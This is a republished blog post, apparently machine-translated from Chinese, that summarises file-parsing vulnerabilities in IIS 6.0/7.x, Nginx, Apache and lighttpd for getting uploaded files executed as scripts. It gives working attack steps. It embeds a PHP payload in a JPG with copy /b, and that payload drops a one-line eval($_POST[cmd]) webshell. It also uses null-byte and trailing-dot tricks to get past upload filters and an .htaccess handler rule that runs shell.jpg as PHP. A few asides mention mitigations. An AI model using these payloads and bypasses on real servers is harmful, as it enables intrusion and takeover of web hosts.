Summary of server parsing vulnerabilities such as IIS 6.0/7.0/7.5, Nginx, Apache, etc.

Source: Internet
Author: User

IIS 6.0


Directory Resolution:/xx.asp/xx.jpg xx.jpg can be replaced with any text file (e.g. xx.txt), the text content is the backdoor code


IIS6.0 will parse the xx.jpg into an ASP file.


Suffix parsing:/xx.asp;. Jpg/xx.asp:.jpg (need to grab package change file name here)


IIS6.0 will successfully parse this type of suffix file into an ASP file.


(Webmaster Comment: IIS6.0 analysis of the cause of the vulnerability, you can consult Rogo wrote a short article: IIS file name Parsing Vulnerability analysis)


{/xx.asp:.jpg Such files are not allowed to exist under Windows:. jpg is automatically removed, leaving/xx.asp}


(Webmaster Comments: Found errors, is not allowed to exist, this path is called "NTFS data Flow", see: IIS6 using the colon upload vulnerability, found IIS6 Vulnerability (upload utilization) under the comments)


Default parsing:/XX.ASA/XX.CER/XX.CDX


IIS6.0 The default executable file, in addition to ASP, contains these three kinds of


(Webmaster Comments: This is mainly because in the IIS default configuration, these suffixes are resolved by default by Asp.dll, so execute permissions and. asp, you can delete the suffix in the configuration, to prevent security risks)


Contact Directory Resolution Vulnerability/xx.asa/xx.jpg or/xx.cer/xx.jpg or Xx.asa can be contacted here. Jpg


[+] IIS 7.0/iis 7.5/nginx <=0.8.37


IIS 7.0/iis 7.5/nginx <=0.8.37


With the default fast-cgi turned on, adding/xx.php after a file path (/xx.jpg) resolves the/xx.jpg/xx.php to a php file.


Common use of the method: a picture and a text file written to the backdoor code after the malicious text is written to the binary code of the picture, to avoid destroying the image file header and tail


e.g. copy xx.jpg/b + yy.txt/a xy.jpg


######################################


/b is binary [binary] mode


/A-ASCII mode xx.jpg normal picture file


Yy.txt content <? PHP fputs (fopen (' shell.php ', ' W '), ' <?php eval ($_post[cmd])?> ');? >


Write a file with a content of <?php eval ($_post[cmd])?> name called shell.php


######################################


Find a place to upload xy.jpg, and then find the address of xy.jpg, and add/xx.php to the address to execute malicious text.


Then just create a word in the picture directory Trojan shell.php password cmd


[+] Nginx <=0.8.37


In the case of fast-cgi shutdown, there is still an parsing vulnerability in Nginx <=0.8.37


Adding%00.php after a file path (/xx.jpg) resolves/xx.jpg%00.php to a php file.


(Webmaster Comments: From the/test.jpg/x.php evolved, specific can refer to: Ngnix empty bytes can be remote Code execution vulnerability)


[+] Apache


Suffix parsing: test.php.x1.x2.x3


Apache will start from right to left to determine the suffix, if the x3 non-identifiable suffix, and then judge the X2 until a recognizable suffix is found, and then the recognition suffix into the parsing


TEST.PHP.X1.X2.X3 will be parsed into PHP


Experience: Php|php3|phtml can be parsed by Apache


(Webmaster comments: About Apache parsing vulnerability can be consulted "Apache vulnerability after the prefix name Parsing Vulnerability")


[+] Some other available


In a Windows environment, xx.jpg[spaces] or xx.jpg. These two types of files are not allowed to exist, if so named, Windows will default to remove spaces or points, which can be exploited!


When uploading data to a Windows host, you can grab the package to modify the file name, add a space or point in the back, try to bypass the blacklist, if the upload is successful, the last point or space will be eliminated, so that the shell can be obtained.


I remember FCK Php 2.6, there is a space bypass vulnerability. {Linux hosts do not work, Linux allows such files to exist}


If you are in Apache. htaccess can be applied (Apache configuration file httpd.conf in the directory allowoverride set to all, Apache will apply the directory under the. htaccess configuration by Sfasfas),


And can be uploaded, you can try to write in. htaccess:


<filesmatch "Shell.jpg" > SetHandler application/x-httpd-php </FilesMatch>


Shell.jpg replaced with the file you uploaded so that shell.jpg can be parsed into PHP files


[+]LIGHTTPD


xx.jpg/xx.php


[Add by El4pse]


This article is from "My World, I am the director." "Blog, be sure to keep this provenance http://biock.blog.51cto.com/4643304/1643911

Summary of server parsing vulnerabilities such as IIS 6.0/7.0/7.5, Nginx, Apache, etc.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.